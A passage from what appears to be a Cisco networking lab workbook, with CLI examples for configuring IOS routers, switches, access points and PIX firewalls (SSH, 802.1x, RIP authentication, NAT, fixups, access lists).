max-incomplete sessions thresholds are [400:500]
max-incomplete tcp connections per host is 50. Block-time 0 minute.
tcp synwait-time is 30 sec -- tcp finwait-time is 5 sec
tcp idle-time is 3600 sec -- udp idle-time is 30 sec
dns-timeout is 5 sec
Inspection Rule Configuration
and on the interface:

#sh ip inspect interface
Interface Configuration
Interface FastEthernet0
Inbound inspection rule is BILLS
Outgoing inspection rule is not set
Inbound access list is 101
Outgoing access list is not set

Outline
This challenge involves defining protocols that should be inspected.
Objectives
NetworkSims.com
899
Define minimum password lengths

Define services.
Example
> en
# config t
(config)# security ?
authentication Authentication security CLIs
passwords
Password security CLIs
(config)# security passwords ?
min-length Minimum length of passwords
(config)# security passwords min ?
<0-16> Minimum length of all user/enable passwords
(config)# service ?
compress-config
config
dhcp
exec-callback
exec-wait
finger
linenumber
nagle
old-slip-prompts
pad
Enable PAD commands
password-encryption
prompt
pt-vty-logging
sequence-numbers
slave-log
tcp-keepalives-in
connections
tcp-keepalives-out
connections
tcp-small-servers
telnet-zeroidle
timestamps
udp-small-servers
log
<cr>
uptime
<cr>
compress-config
config
dhcp
exec-callback
exec-wait
finger
linenumber
NetworkSims.com
900
nagle
old-slip-prompts
pad
password-encryption
prompt
pt-vty-logging
sequence-numbers
slave-log
tcp-keepalives-in

Enable PAD commands
connections
tcp-keepalives-out
connections
tcp-small-servers
telnet-zeroidle
timestamps
udp-small-servers

Outline
Objectives
Enable 802.1x.
Example
> en
# config t
(config)# int fa0/1
default
host-mode
max-req
Max No.of Retries
port-control
timeout
Various Timeouts
auto
force-authorized
NetworkSims.com
901

<cr>
(config-if)# dot1 t ?
quiet-period
reauth-period
initiated
supp-timeout
tx-period
(config-if)# dot1 t r ?

Outline
Objectives
Enable BPDU guard.

Example
> en
# config t
Switch(config)#
backbonefast
etherchannel
extend
loopguard
mode
mst
pathcost
portfast
uplinkfast
vlan
spanning-tree ?
NetworkSims.com
902
bpduguard
Enable portfast
default
Enable portfast
portfast ?

<cr>
aging
maximum
Max secure addrs
violation
<cr>
H.H.H
48 bit mac address

Outline
DHCP snooping.
Objectives

Example
NetworkSims.com
903
> en
# config t
conflict
database
excluded-address
ping
pool
relay
smart-relay
snooping
DHCP Snooping
vlan
DHCP Snooping vlan
<cr>
Switch(config-if)# ip dhcp snooping limte rate ?
Switch(config-if)# ip dhcp snooping limte rate 30
NetworkSims.com
904
19 Cisco
Academy
Security 1
Network
Router Challenge 195

# config t
ap(config)# username fred password bert
End with CNTL/Z.

ap # show crypto key mypubkey rsa
Key Data:
305C300D 06092A86 4886F70D 01010105
D28C19FD 3587872D ED4834F0 707B1D8F
521A750B B9C09A7F E14275B9 AA29B962
Key Data:
307C300D 06092A86 4886F70D 01010105
26C2CE81 B264D2C0 9C52AD73 90731CF7
1D80B1E7 74E194B2 3F6C6EA8 8D1505DB
78D60CFF 2B568C97 0CF21335 0DE55420
ap (config)# ip ssh ?
authentication-retries
break-string
port
rsa
source-interface
time-out
version
NetworkSims.com
UTC Mar 1 2002
00034B00 30480241 00CE28A6 6697D889

944F665E 084DA46B 9D9C0BF4 E992059A
BB0CCCAA 9FA30168 7B020301 0001
UTC Mar 1 2002
00036B00
34D122BC
485AD29F
BD7929AE
30680261
59CD560F
A982AB04
763EDDB9
00D56417
9600714C
950DD4CA
A1020301
15E52D1C
E8DB3AA8
ED113E5F
0001
Specify number of authentication retries

break-string
Starting (or only) Port number to listen on
Configure RSA keypair name for SSH
Specify interface for source address in SSH
connections
Specify SSH time-out interval
Specify protocol version to be supported
905
ap (config)# ip ssh time-out ?

<1-120> SSH time-out interval (secs)
ap (config)# ip ssh time-out 60
ap (config)# ip ssh authentication-retries ?
<0-5> Number of authentication retries
ap (config)# ip ssh authentication-retries 2
ap (config)# ip ssh version ?
<1-2> Protocol version
ap (config)# ip ssh version 2
ap (config)# line vty 0 4
ap (config-line)# transport ?
input
Define which protocols to use when connecting to the terminal
server
output
Define which protocols to use for outgoing connections
preferred Specify the preferred protocol to use
(config-line)# transport input ?
all
All protocols
mop
DEC MOP Remote Console Protocol
none
No protocols
pad
X.3 PAD
ssh
TCP/IP SSH protocol
udptn
UDPTN async via UDP protocol
v120
Async over ISDN
ap (config-line)# transport input ssh
ap (config-line)# login ?
local
Local password checking
tacacs Use tacacs server for password checking
<cr>
ap (config-line)# login local

Outline
Objectives

Define timestamps.
Disable CDP on an interface.
Disable ICMP on an interface.
Disable SNMP.
Restrict Web access.
NetworkSims.com
906
Example
> en
# config t
(config)# service ?
compress-config
config
dhcp
exec-callback
exec-wait
finger
linenumber
nagle
old-slip-prompts
pad
password-encryption
prompt
pt-vty-logging
sequence-numbers
slave-log
tcp-keepalives-in

Enable PAD commands
connections
tcp-keepalives-out
connections
tcp-small-servers
telnet-zeroidle
timestamps
udp-small-servers
log
<cr>
uptime
<cr>
compress-config
config
dhcp
exec-callback
exec-wait
finger
linenumber
nagle
old-slip-prompts
pad
Enable PAD commands
password-encryption
prompt
pt-vty-logging
sequence-numbers
slave-log
tcp-keepalives-in
connections
tcp-keepalives-out
connections
tcp-small-servers
NetworkSims.com
907
telnet-zeroidle
timestamps
udp-small-servers
To disable ping on the interface:

(config)# int e0
(config-if)# no ip ?
access-group
accounting
address
audit
auth-proxy
authentication
bandwidth-percent
broadcast-address
cef
cgmp
Enable/disable CGMP
dhcp
dvmrp
flow
hello-interval
helper-address
hold-time
idle-group
igmp
information-reply
inspect
Apply inspect name
irdp
load-sharing
local-proxy-arp
mask-reply
mobile
Mobile IP support
mrm
mroute-cache
mtu
multicast
nat
nbar
next-hop-self
nhrp
ospf
pgm
pim
policy
proxy-arp
Enable proxy ARP
rarp-server
redirects
rgmp
Enable/disable RGMP
rip
route-cache
router
NetworkSims.com
908
rsvp
rtp
RTP parameters
sap
security
split-horizon
summary-address
tcp
unnumbered
unreachables
urd
verify
vrf
wccp
(config-if)# no ip redirects
(config-if)# no ip unreachables
(config-if)# no ip mask-reply
To disable multiroute-cache:
(config-if)# no ip mroute-cache
(config-if)# exit
To setup Web access from only a single host:

(config)# ip http server access-class 5
And to disable SNMP:


Outline
This challenge involves the configuration of RIP Version 2 with authenticated routing tables.
Objectives

Example
> en
# config t
(config)# router
(config-router)#
(config-router)#
(config-router)#
rip
version 2
network 194.205.128.0
?
NetworkSims.com
909

address-family
auto-summary
default
default-information
default-metric
distance
distribute-list
exit
help
input-queue
maximum-paths
neighbor
network
no
offset-list
output-delay
passive-interface
redistribute
protocol
timers
traffic-share
routing updates
version
(config)# key ?
chain
WORD Key-chain name
exit
key
Configure a key
no
(config-keychain-key)# ?
Key-chain key configuration commands:
accept-lifetime Set accept lifetime of key
default
exit
Exit from key-chain key configuration mode
key-string
Set key string
no
send-lifetime
Set send lifetime of key
(config)# int e0
(config-if)# ip rip ?
advertise
Specify update interval
receive
send
v2-broadcast
(config-if)# ip rip authentication ?
mode
Authentication mode
NetworkSims.com
910

LINE name of key-chain
md5
key-chain ?
key-chain martin
mode ?
mode md5

Outline
This challenge involves the configuration of RIP Version 2 with authenticated routing tables,
and using a distribution-list with passive interfaces.
Objectives

Define a routing filter to limit the transmission of routing information.
Define a passive-interface for routing updates.
Example
> en
# config t
(config-router)# distribution-list 10 in fa0/1
(config-router)# passive-interface fa0/2
(config)# int fa0/1
(config-if)# ip rip authentication key-chain martin
The passive-interface command stops the transmission of the routing tables on the specified
interface.

NetworkSims.com
911
Outline
Objectives
Setup the hostname.

Setup IP address of E0.
Enable E0.

# sh ip add
# sh nameif
# config t
(config)# help hos
USAGE:
hostname <name>
DESCRIPTION:
hostname
Change host name

DESCRIPTION:
domain-name
Change domain name
(config)# exit
# show ip add
# show running
# sh int e0
NetworkSims.com
912


# sh nameif
# config t
(config)# help hostname
USAGE:
hostname <name>
DESCRIPTION:
hostname
Change host name

DESCRIPTION:
domain-name
Change domain name
(config)# hostname ?
WORD < 64 char Host name for this system. A hostname must start and end with
a letter or digit and have as interior characters only
letters, digits, or a hyphen.
(config)# domain-name?
WORD Domain names must begin and end with a digit/letter, only letters,
digits, and hyphen are allowed as internal characters, labels are
separated by a dot. A maximum of 63 characters is allowed.
(config)# int e0
(config-if)# help ip
USAGE:
NetworkSims.com
913

clear ip
DESCRIPTION:
ip
SYNTAX:
<ip_address>
<mask>
<sby_ip_addr>
<4-16>
<interface>:
<if_name>:

see also:
(config-if)# help shut
USAGE:
[no] shutdown
DESCRIPTION:
shutdown
(config-if)# exit
(config)# exit
# show ip add
# sh ip add
# show running
myPIX # sh int e0
NetworkSims.com
914

myPIX # sh int e1
Interface Ethernet1 inside, is down, line protocol is down

Outline
This challenge involves the configuration of basic PIX details (E1 and E2).
Objectives

Example (Ver 6.x)

> enable
# nameif
# config t
(config)# exit
# show ip
# show running
# sh int e1
NetworkSims.com
915

Example (Ver 7.x)

> enable
# sh nameif
# config t
(config)# int e1
(config-if)# exit
(config)# int e2
(config-if)# exit
(config)# exit
# show ip add
# show running
# sh int e1

Outline
This challenge involves the configuration of basic PIX details (names of interfaces, security
levels, and so on).
Objectives
NetworkSims.com
916
Define the name of each of the interfaces.
Example (Ver 6.x)

> enable
# nameif
# config t
(config)# nameif e0 mars security0
(config)# nameif e1 pluto security100
(config)# nameif e2 jupiter security50
USAGE:
no username <name>
DESCRIPTION:
username
SYNTAX:
<username>

<nopassword>
<password>
encrypted
<level>
attributes
(config)# exit
# show running
Example (Ver 7.x)

> enable
# nameif
# config t
(config)# int e0
(config-if)# nameif mars
(config-if)# exit
(config)# int e1
(config-if)# nameif pluto
(config-if)# exit
(config)# int e2
(config-if)# help nameif
USAGE:
nameif <if_name>
no nameif [<if_name>]
show running-config [all] nameif [<interface>]
NetworkSims.com
917
show nameif [<interface>]

clear nameif
DESCRIPTION:
nameif
SYNTAX:
<if_name>
<interface>:
A name by which this interface will be referred in all

other commands
Interface identifier as used in the 'interface' command.
see also:
security-level, interface, static, global, nat
(config-if)# nameif jupiter
(config-if)# help security-level
USAGE:
security-level <0-100>
no security-level [<0-100>]
DESCRIPTION:
security-level
Specify security level of interface
SYNTAX:
<0-100>
The security level of this interface from 0 to 100.

The relative security level between two interfaces determines
the way the Adaptive Security Algorithm is applied.
A lower security_level interface is outside relative to a higher
level interface and equivalent interfaces are outside to each
other.
see also:
nameif
(config-if)# exit
USAGE:
no username <name>
DESCRIPTION:
username
SYNTAX:
<username>
<nopassword>
<password>
encrypted
<level>
attributes

NetworkSims.com
918

(config)# exit
# show running
# show running user

Outline
This challenge involves the configuration of basic PIX details (HTTP, Passwords, MOTD,
and so on).
Objectives
Defines a hostname and passwords

Enables the HTTP server.
Defines a MOTD banner.
Example (Ver 6.x)

> enable
# nameif
# config t
(config)# help enable
USAGE:
enable password [<pw>] [level <level>] [encrypted]
no enable password level <level>
show running-config enable
DESCRIPTION:
enable
Configure enable passwords
SYNTAX:
<pw>
The password for this privilege level
<level>
The privilege level
<encrypted>
Indicates that this password is encrypted
(config)# enable ?
password Configure password for the enable command
(config)# enable password ?
WORD Enter a password for the privilege level
<cr>
NetworkSims.com
919
(config)# enable password kirk

(config)# password ?
configure
WORD A
(config)#
(config)#
password of up to 16 alphanumeric characters
passwd kent
help password
USAGE:
[no] password|passwd <password> encrypted
clear configure passwd
DESCRIPTION:
passwd
Change Telnet console access password
SYNTAX:
<password>
A password of up to 16 alphanumeric characters

Factory-default password is cisco
encrypted
see also:
telnet
(config)# help http
USAGE:
[no] http <local_ip> <mask> <if_name>
[no] http server enable
DESCRIPTION:
http
Configure HTTP server
SYNTAX:
<local_ip>

access the device HTTP server.
<mask>

Default is 255.255.255.255.
<if_name>
see also:
password, aaa
(config)# help banner
USAGE:
banner {exec | login | motd} <text>
no banner {exec | login | motd} [<text>]
show banner [{exec | login | motd}]
clear banner
DESCRIPTION:
banner
Configure login/session banners
SYNTAX:
NetworkSims.com
920
exec
Configures the system to display a banner before the enable prompt

is displayed.
login
Configures the system to display a banner before the password login

prompt when accessing the device using telnet.
motd
Configures the system to display a message-of-the-day banner.
<text>
A line of the message to be displayed. It will be added to the end

of an existing banner. The tokens $(domain) and $(hostname) will be
replaced with the host name and domain name.
(config)# banner motd hello
(config)# show banner
# show banner
Example (Ver 7.x)

As V6.0, but use show running banner instead of show banner.

Outline
This challenge involves the configuration of a static route, and some banners.
Objectives
Define a static route.

Define banners.
Example
mypix(config)# help route
USAGE:
[no] route <if_name> <foreign_ip> <mask> <gateway>
[<metric>|tunneled]
clear configure route [<if_name>]
clear route [<if_name>]
show running-config route
show route [<if_name>]
DESCRIPTION:
route
Enter a static route for an interface
SYNTAX:
<if_name>

for which the route will apply
<foreign_ip>
The foreign network for this route, 0 means default
NetworkSims.com
921
<mask>
The netmask for the destined foreign network <foreign_ip>
<gateway>
The address of the gateway by which <foreign_ip> is reached
<metric>
tunneled
Specifies route as the default tunnel gateway for VPN traffic.
see also:
rip, ping
pixfirewall(config)# route inside 10.0.0.0 ?

pixfirewall(config)# route inside 10.0.0.0 255.255.0.0 ?
is reached.
pixfirewall(config)# route inside 10.0.0.0 255.255.0.0 206.59.124.10 ?
<1-255>
to 255
myPIX (config)# route outside 10.0.0.0 255.255.0.0 206.59.124.10
myPIX (config)# show route
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
banner motd admin device

banner login personal device
banner exec main device
show domain-name
myPIX (config)# domain-name dumfries.eu

Outline
This challenge involves the configuration of Telnet, SSH and Console timeouts.
Objectives
Setup the hostname.

Define the Telnet timeout.
Define the SSH timeout.
Define the Console timeout.
Example
NetworkSims.com
922
myPIX (config)# hostname arizona

arizona (config)# domain-name fife.nu
arizona (config)# show domain-name
myPIX (config)# help telnet
USAGE:
[no] telnet <local_ip> <mask> <if_name>
telnet timeout <number>
no telnet timeout [<number>]
DESCRIPTION:
telnet
Add telnet access to device console and set idle timeout
SYNTAX:
<local_ip>

login to the device
<mask>
<if_name>
<number>
Idle time in minutes after which a telnet session will be closed.

Default is 5 minutes.
see also:
ssh, password, aaa
arizona (config)# telnet timeout 8
arizona (config)# help ssh
USAGE:
[no] ssh <local_ip> <mask> <if_name>
[no] ssh timeout <number>
[no] ssh version 1|2
[no] ssh scopy enable
show ssh sessions [<client_ip>]
ssh disconnect <session_id>
DESCRIPTION:
ssh
Add SSH access to the Device console, set idle timeout, set
version supported, enable Secure Copy as an SSH application,
display a list of active SSH sessions, and terminate an SSH
session.
SYNTAX:
<local_ip>
The IP address of the host and/or network authorized to

login to the Device.
<mask>
<if_name>
<number>
Idle time in minutes after which a SSH session will be closed.
<client_ip>
The IP address of the SSH client.
NetworkSims.com
923
<session_id>
Session ID as displayed by the 'show ssh sessions' command.
see also:
telnet, password, enable, aaa
arizona (config)# ssh timeout 9
pixfirewall(config)# help console
USAGE:
[no] console timeout <number>
DESCRIPTION:
console
Set idle timeout for the serial console of the PIX
SYNTAX:
<number>
Valid range <0-60>. For <1..60>, console session will be

closed after idle time of <1..60> minutes. console
will never close for timeout <0>
see also:
telnet, ssh, passwd, aaa
arizona (config)# console timeout 9
arizona (config)# show telnet
arizona (config)# show ssh
arizona (config)# show console

Outline
This challenge involves the configuration of the security levels on the interfaces.
Objectives
Rename the interfaces, and define the security level on each interface.
Note: A port with the name of outside always has a security level of 0, while a port with the
name of inside always has a security level of 100.
Example (Ver 6.x)
myPIX (config)# nameif e0 strathclyde security24
myPIX
(config)#
nameif
e1
myPIX (config)# nameif e2 rhodeisland security44
orkney
security61
Example (Ver 7.x)

> enable
# nameif
NetworkSims.com
924
# config t
(config)# int e0
(config-if)# nameif strathclyde
(config-if)# exit
(config)# int e1
(config-if)# nameif orkney
(config-if)# exit
(config)# int e2
(config-if)# nameif rhodeisland
(config-if)# exit
(config)# exit
# show running

Outline
This challenge involves the configuration of a shutdown on the interfaces.
Objectives

Shutdown each of the interfaces.
Example (6.x)
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
nameif e0 gretna security0

nameif e1 alabama security100
nameif e2 uranus security50
show nameif
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#

show int
show int e0
show int e1
show int e2
Example (Ver 7.x)

> enable
# nameif
# config t
(config)# int e0
NetworkSims.com
925
(config-if)# exit
(config)# int e1
(config-if)# exit
(config)# int e2
(config-if)# exit
(config)# exit
# show running

Outline
This challenge involves the configuration of interfaces for various settings, such as duplex,
speed, and so on.
Objectives

Define the basic operation of the interfaces.
Example (Ver 6.x)

myPIX (config)# nameif e0 hawaii security0
myPIX (config)# nameif e1 alberta security100
Example (Ver 7.x)

> enable
# nameif
# config t
(config)# help interface
USAGE:
interface <type> <port>
interface <type> <port>.<subif_number>
no interface <type> <port>.<subif_number>
show running-config [default] interface {<type> <port>[.<subif_number>]}
show interface {<type> <port>[.<subif_number>] | <if_name>}
NetworkSims.com
926
[detail|stats|ip brief]
clear config interface {<type> <port>[.<subif_number>]}
clear interface {<type> <port>[.<subif_number>]}
DESCRIPTION:
interface
Set network interface parameters

show/clear interface counters
show brief summary of IP status and configuration
SYNTAX:
<type>
<port>
<subif_number>
<if_name>
Type of interface to be configured

Possible values: Ethernet, GigabitEthernet
Port number. Refer to the appropriate hardware manual for
port information
Subinterface number in the range 1 to 4,294,967,293
WARNING! Using 'no' on a Subinterface will remove the interface

from the system. Removing a Subinterface will delete all
configuration rules applied to the interface. Exercise caution when
using the 'no interface' command.
see also:
allocate-interface
(config)# int e0
(config-if)# help du
USAGE:
duplex auto|full|half
no duplex [auto|full|half]
DESCRIPTION:
duplex
Configure duplex operation
SYNTAX:
auto
full
half
Enable AUTO duplex configuration

Force full duplex operation
Force half-duplex operation
see also:
speed
(config-if)# help speed
USAGE:
speed 10|100|1000|auto
no speed [10|100|1000|auto]
DESCRIPTION:
speed
Configure speed operation
SYNTAX:
Possible Ethernet values are:
10
NetworkSims.com
927
100
auto

Possible GigabitEthernet values are:

10
100
1000
auto
see also:
duplex
(config-if)# exit
(config)# int e1
(config-if)# exit
(config)# int e2
(config-if)# exit
(config)# exit
# show running

Outline
Objectives

Example
myPIX (config)# help dhcpd
USAGE:
dhcpd
dhcpd
dhcpd
dhcpd
dhcpd
address <ip1>[-<ip2>] <srv_ifc_name>

dns <dnsip1> [<dnsip2>]
wins <winsip1> [<winsip2>]
lease <lease_length>
ping_timeout <timeout>
NetworkSims.com
928
dhcpd domain <domain_name>

dhcpd option <code> {ascii <string> | hex <hex_string> |
ip <address_1> [<address_2>]}
dhcpd enable <srv_ifc_name>
dhcpd auto_config <clnt_if_name>
show dhcpd [binding|statistics]
clear dhcpd
clear dhcpd [binding|statistics]
DESCRIPTION:
dhcpd
Configure DHCP Server
SYNTAX:
<ip1>
<ip2>
<dnsip>
<winsip>
<lease_length>
<timeout>
<domain_name>
<code>
<string>
<hex_string>
<address_1>
<address_2>
<srv_ifc_name>
Start address of the DHCP address pool

End address of the DHCP address pool
DNS server IP address
NetBios name server IP address
DHCP lease length in seconds
Ping timeout in milliseconds
DNS domain name
positive number representing the DHCP option code
ASCII string without whitespace
hexadecimal string without whitespace
IP address
IP address
Interface to enable DHCP server
<clnt_if_name>
myPIX (config)#
myPIX (config)#
myPIX (config)#
myPIX (config)#
myPIX (config)#
myPIX (config)#
Interface to retrieve DHCP client info

dhcpd enable
dhcpd wins 195.94.110.3
dhcpd lease 6
show dhcpd

Outline
This challenge involves the configuration of fixups.
Objectives
Define fixup protocols.

Show fixup protocols.
Example (V6.x)
myPIX (config)# help fixup
NetworkSims.com
929
USAGE:
[no] fixup protocol <prot> [<option>] <port>[-<port>]
DESCRIPTION:
fixup
Add or delete inspection service and feature defaults
SYNTAX:
<prot>
Protocol fixup to be enabled or disabled:

ctiqbe, dns [maximum-length <length>], ftp [strict], h323,
http, icmp [error], ils, mgcp, netbios, pptp, rsh, rtsp, sip,
skinny, smtp, snmp, sqlnet, sunrpc, sunrpc_udp, tftp, xdmcp
The fixup can be disabled via the no form of the command, e.g.,
no fixup protocol ftp strict 21
<option>
option to the inspection function
<port1>[-<port2>]
A range of ports to enable the fixup
myPIX (config)# fixup protocol ?
ctiqbe
dns
ftp
h323
http
icmp
ils
mgcp
netbios
pptp
rsh
rtsp
sip
skinny
smtp
snmp
sqlnet
sunrpc
sunrpc_udp
tftp
xdmcp
myPIX (config)# fix pro http ?
WORD
Specify port(s) to enable fixup, <port1>[-<port2>]; default port(s):
ctiqbe--------------2748 ftp-------------------21
gtp------------2123,3386 h323-h225-----------1720
h323-ras-------1718-1719 http------------------80
ils------------------389 mgcp-----------2427,2727
netbios----------137-138 pptp----------------1723
rsh------------------514 rtsp-----------------554
NetworkSims.com
930
sip-----------------5060 skinny--------------2000
smtp------------------25 snmp-----------------161
sqlnet--------------1521 sunrpc---------------111
sunrpc_udp-----------111 tftp------------------69
xdmcp----------------177
highs Ports 1024-65535
lows
Ports 1-1023
udp
Enable SIP over UDP application inspection
myPIX (config)# fixup protocol http 161
myPIX (config)# fixup protocol ftp 60
myPIX (config)# fixup protocol smtp 84
myPIX (config)# show fixup
Example (V7.x)
As V6.x but replace show fixup with:
myPIX # sh run fix
INFO: All 'fixup' commands have been converted to 'inspect' commands.
Please use 'show running-config service-policy' in conjunction
with 'show running-config policy-map' to view the new configuration.
myPIX # sh run service-p
myPIX # sh run policy-m
!
inspect ftp
inspect h323 h225
inspect h323 ras
inspect rsh
inspect rtsp
inspect esmtp
inspect sqlnet
inspect skinny
inspect sunrpc
inspect xdmcp
inspect sip
inspect netbios
inspect tftp
inspect http
!

Outline
This challenge involves the configuration of an encryption key.
Objectives
NetworkSims.com
931

Define a user and a password.
Create an RSA key.
Show the RSA key.
Example
myPIX (config)# domain-name fife.nu
myPIX (config)# help ca
USAGE:
crypto ca trustpoint <name>
no crypto ca trustpoint <name> [noconfirm]
crypto ca authenticate <name> [fingerprint <hex value>] [nointeractive]
crypto ca enroll <name> [noconfirm]
crypto ca import <name> certificate [nointeractive]
crypto ca import <name> pkcs12 <passphrase> [nointeractive]
crypto ca export <name> pkcs12 <passphrase>
crypto ca crl request <name>
crypto ca certificate map <sequence #>
crypto ca certificate chain <name>
clear configure crypto ca trustpoint
clear configure ca certificate map [<sequence #>]
clear crypto ca crls [<name>]
show crypto ca crls [<name>]
show crypto ca certificates [<name>]
show running-config [all] crypto ca
DESCRIPTION:
ca
Configure the Certification Authority.
SYNTAX:
trustpoint
authenticate
enroll
import
export
Get the CA certificate
Export a trustpoint configuration with all associated
keys and certificates in PKCS12 format
crl
For manual CRL polling, displaying, and erasing.
certificate map
Define certificate attributes map
certificate chain
Enter certificate chain configuration mode for the
indicated trustpoint
noconfirm
Suppress all interactive prompting
nointeractive
Execute the command in non-interactive mode
fingerprint
A key consisting of alphanumeric characters that is
used to authenticate the CA's certificate.
<name>
A nickname for the CA server.
<passphrase>
A required password that gives the CA administrator
some authentication when a user calls to ask for a
certificate to be revoked.
It can be up to 80 characters in length.
<sequence #>
Sequence to insert into certificate map entry
see also: key, crypto, ipsec, isakmp, tunnel-group
myPIX (config)# ca generate rsa key 256
myPIX (config)# show ca mypubkey rsa
NetworkSims.com
932

Outline
This challenge involves the configuration of NAT.
Objectives
Define inside address range.

Define outside address range.
Show NAT parameters.
Show Global parameters.
Example (Ver 6.x)

myPIX (config)# help nat
USAGE:
[no] nat (<if_name>) <nat_id> <local_ip> [<mask>]
[dns] [outside]
[no] nat (if_name) <nat_id> access-list <acl-name>
[dns] [outside]
DESCRIPTION:
nat
Associate a network with a pool of global IP addresses
SYNTAX:
<if_name>
The name of the network interface, as specified by 'nameif',

where the hosts/network designated by <local_ip> are accessed.
<nat_id>
The id of this group of hosts or networks. This id will

be referenced by the 'global' command to associate a global
pool with this command. The id '0' is reserved to indicate
(i) no address translation with the access-list option or
(ii) identity translation for the <real_ip> option. The
maximum nat_id with access-list is 65535. The maximum
nat_id without access-list is 2147483647.
<local_ip>
The hosts/networks in this <nat_id> group.

'0' indicates all networks or the default <nat_id> group
An IP address not found in a more explicit <nat_id> group
will default to a less explicit or '0', the least explicit
<mask>
NetworkSims.com
933
dns
Use the created xlate to rewrite DNS address record.
tcp
TCP connections.
udp
UDP connections.
<max_conns>
The maximum number of simultaneous connections.

the <local_ip> hosts will each be allowed to use.
Idle connections are closed after the time specified by the
<emb_limit>
The maximum number of embryonic connections per host.

An embryonic connection is a connection request that has not
finished the necessary handshake between source and destination.
norandomseq
<acl-name>
access-list name.
see also:
access-list, apply, global
myPIX (config)# nat ?

( Open parenthesis for the name of the network interface where
the hosts/network designated by the local IP address are accessed
myPIX (config)# nat (inside) ?
<0-2147483647> The <nat_id> of this group of hosts/networks. This <nat_id>
will be referenced by the global command to associate a
global pool with the local IP address. <nat_id> '0' is used
to indicate no address translation for local IP. The limit
is 65535 with access-lists
myPIX (config)# nat (inside) 1 ?
Hostname or A.B.C.D The hosts/networks in this <nat_id> group, '0' indicates
all networks or the default <nat_id> group
access-list
Specify access-list name after this keyword
myPIX (config)# nat (inside) 1 143.163.128.0 ?
A.B.C.D IP netmask to apply to the local IP address
<cr>
myPIX (config)# nat (inside) 1 143.163.128.0 255.255.192.0
myPIX (config)# help global
USAGE:
[no] global (<ext_if_name>) <nat_id> {<global_ip>[-<global_ip>] [netmask
<global_mask>]} | interface
DESCRIPTION:
global
Specify, delete or view global address pools,

or designate a PAT(Port Address Translated) address
SYNTAX:
<(ext_if_name)> The external network interface name
<nat_id>
The id of the nat group(from the nat command) that
NetworkSims.com
934
will draw from these global addresses

<global_ip>
The IP address, network or range of addresses that will

dynamically be translated on an as needed basis to hosts
in the nat group <nat_id>.
If this <ext_if_name> is connected to the Internet, the
<global_ip> should be registered with the Network Information
Center(NIC).
These addresses should also be reverse resolvable(in-addr.arpa)
on the outside DNS servers.
An address specified singly will be used as a PAT address.
When all of the non-PAT addresses of a global pool are in use
and there is a PAT address, subsequent hosts from the nat
group <nat_id> will share the single PAT address for up to
the number of licensed connections.
[netmask <global_mask>] The netmask of the global_ip.
interface
IP address of <ext_if_name> overloaded for PAT.
see also:
nat, alias, static
myPIX (config)# global ?

( Open parenthesis for the external network interface name
myPIX (config)# global (outside) 3 ?
WORD
Enter IP address or a range of IP addresses <start_ip>[-<end_ip>]
interface Specifies PAT using the IP address at the interface
myPIX (config)# global (outside) 3 137.68.10.3-137.68.10.23 ?
netmask Specify netmask for the IP address(es) after this keyword
<cr>
myPIX (config)# global (outside) 3 1.2.3.4 net ?
A.B.C.D Netmask for the IP address(es)
myPIX (config)# global (outside) 3 137.68.10.3-137.68.10.23 netmask 255.255.255.0
myPIX (config)# show nat
myPIX (config)# show global
Example (Ver 7.x)

As Ver 6.0, but replace show nat and show global with:
myPIX (config)# show running nat
myPIX (config)# show running global

Outline
NetworkSims.com
935
Objectives
Define the IP address and subnet mask of the interfaces.

Define a static mapping.
Example (Ver 6.x)

myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
ip address outside 84.120.11.5 255.128.0.0

ip address inside 10.10.0.1 255.128.0.0
ip address inf 172.16.0.1 255.128.0.0
show ip address
static (inside, outside) 84.120.11.15 211.204.152.13
show static
Example (Ver 7.x)

myPIX (config-if)# nameif outside
myPIX (config-if)# nameif inside
myPIX
myPIX
myPIX
myPIX
(config-if)#
(config-if)#
(config-if)#
(config-if)#
int e2
ip address 172.16.0.1 255.128.0.0
nameif inf2
exit
myPIX (config)# show ip address

myPIX (config)# help static
USAGE:
[no] static [(real_ifc, mapped_ifc)]
{<mapped_ip>|interface}
{<real_ip> [netmask <mask>]} | {access-list <acl_name>}
[dns]
[udp <max_conns>]
[no] static [(real_ifc, mapped_ifc)] {tcp|udp}
{<mapped_ip>|interface} <mapped_port>
{<real_ip> <real_port> [netmask <mask>]} |
{access-list <acl_name>}
[dns]
[udp <max_conns>]
DESCRIPTION:
static
Configure one-to-one address translation rule
SYNTAX:
NetworkSims.com
936
<real_ifc>

where the hosts or networks designated by <real_ip> or
sources in access-list are accessed.
<mapped_ifc>

where the <real_ip> or by the source in access-list are
translated into <mapped_ip>.
tcp
TCP static PAT.
udp
UDP static PAT.
<real_ip>
Address as configured at the actual host.
<real_port>
Port as viewed from the actual host.
<mapped_ip>
Masquerade address of the <real_ip> or of the source

address in access-list.
<mask>
The IP netmask to apply to <real_ip>.
<mapped_port>

interface
Address taken from <mapped_ifc>.
<mapped_port>

<acl_name>
The access-list name with the source fields defining

the real address and real port, if applicable,
before translation.
dns
Rewrite DNS address record.
norandomseq
nailed
Allow TCP sessions for asymmetrically routed traffic
<max_conn>
The maximum number of simultaneous TCP connections that

each <real_ip> hosts will each be allowed to use. Idle
connections are closed after the time specified by the
<emb_limit>
Maximum number of embryonic connections per host. An

embryonic connection is a connection request that has not
completed TCP 3-way handshake between source and
destination.
see also:
nat, global
myPIX (config)# static ?
( Open parenthesis for (<internal_if_name>,<external_if_name>) pair
where <internal_if_name> is the Internal or prenat interface and
myPIX (config)# static (inside, outside) 84.120.11.15 211.204.152.13
myPIX (config)# show running static

NetworkSims.com
937
Outline
This challenge involves the configuration of the activation key.
Objectives
Configure the activation key.

Show the activation key.
Example
myPIX # help activation-key
USAGE:
show activation-key
DESCRIPTION:
activation-key
SYNTAX:
myPIX (config)# activation-key 1aa3aaab abfbcef1 133445ee ee56f6b0
myPIX (config)# show activation-key

Outline
This challenge involves the configuration of an access-list.
Objectives
Define a named access-list.

Apply the access-list onto an interface.
Example
myPIX (config)# help access-l
NetworkSims.com
938
USAGE:
Extended access list:
Use this to configure policy for IP traffic through the firewall
[no] access-list <id> [line <line_num>] [extended] {deny | permit}
{<protocol> | object-group <protocol_obj_grp_id>}
[no] access-list <id> [line <line_num>] {deny | permit} icmp
